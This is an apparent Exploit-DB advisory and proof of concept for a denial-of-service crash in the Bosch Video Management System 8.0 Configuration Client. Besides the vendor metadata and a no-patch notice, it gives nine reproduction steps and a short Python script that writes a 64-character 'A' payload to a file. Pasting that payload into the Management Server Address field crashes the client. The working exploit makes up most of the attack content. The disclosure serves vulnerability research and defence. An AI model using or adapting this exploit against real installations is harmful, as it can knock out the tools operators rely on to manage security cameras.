Vendor: Bosch Video Management System
By: Daniel
CVSS: 5.5 (MEDIUM)
Type: Denial of Service
CWE: 400
Product Name: Bosch Video Management System
Affected Version From: 8
Affected Version To: 8
Patch Exists: NO
Platforms Tested: Windows 10 Pro x64
Year: 2018

Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc)

This proof of concept causes a denial of service in the Bosch Video Management System 8.0 Configuration Client by crashing it. A Python script writes a payload of 64 "A" characters to a file named 'bosch.txt'. The crash occurs when the contents of that file are pasted into the "(Enterprise) Management Server Address:" field of the Configuration Client, reached by selecting "Address Book" in the 'Connection:' box, and 'OK' is clicked with a username and password filled in.

Mitigation:

No official patch or mitigation is available at the moment.

Exploit-DB raw data:

# Exploit Title: Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc)
# Discovery by: Daniel
# Discovery Date: 2018-11-12
# Software Name: Bosch Video Management System
# Software Version: 8.0
# Vendor Homepage: https://www.boschsecurity.com/xc/en/products/management-software/bvms/
# Software Link: https://la.boschsecurity.com/es/productos/videosystems_1/videosoftware_1/videomanagementsystems_1/boschvideomanagementsyste_8/boschvideomanagementsyste_8_44761
# Tested on: Windows 10 Pro x64

# Make sure that during the installation of the software you installed all the program features available.
# This PoC was carried out in 'Configuration Client', which is part of 'Bosch Video Management System'.

# Steps to produce the crash:
# 1.- Run: dos.py
# 2.- Open bosch.txt and copy content to clipboard
# 3.- Open Configuration Client (Normally the installer creates a direct link in desktop)
# 4.- Click on 'Connection:' box and select "Address Book"
# 5.- Copy clipboard in "(Enterprise) Management Server Address:"
# 6.- Write "test" in 'Username'
# 7.- Write "test" in 'Password'
# 8.- Click on 'OK'
# 9.- Crash


#!/usr/bin/python

# Payload: 64 "A" (0x41) characters, written to bosch.txt
buf = "\x41" * 64
with open('bosch.txt', 'w') as f:
    f.write(buf)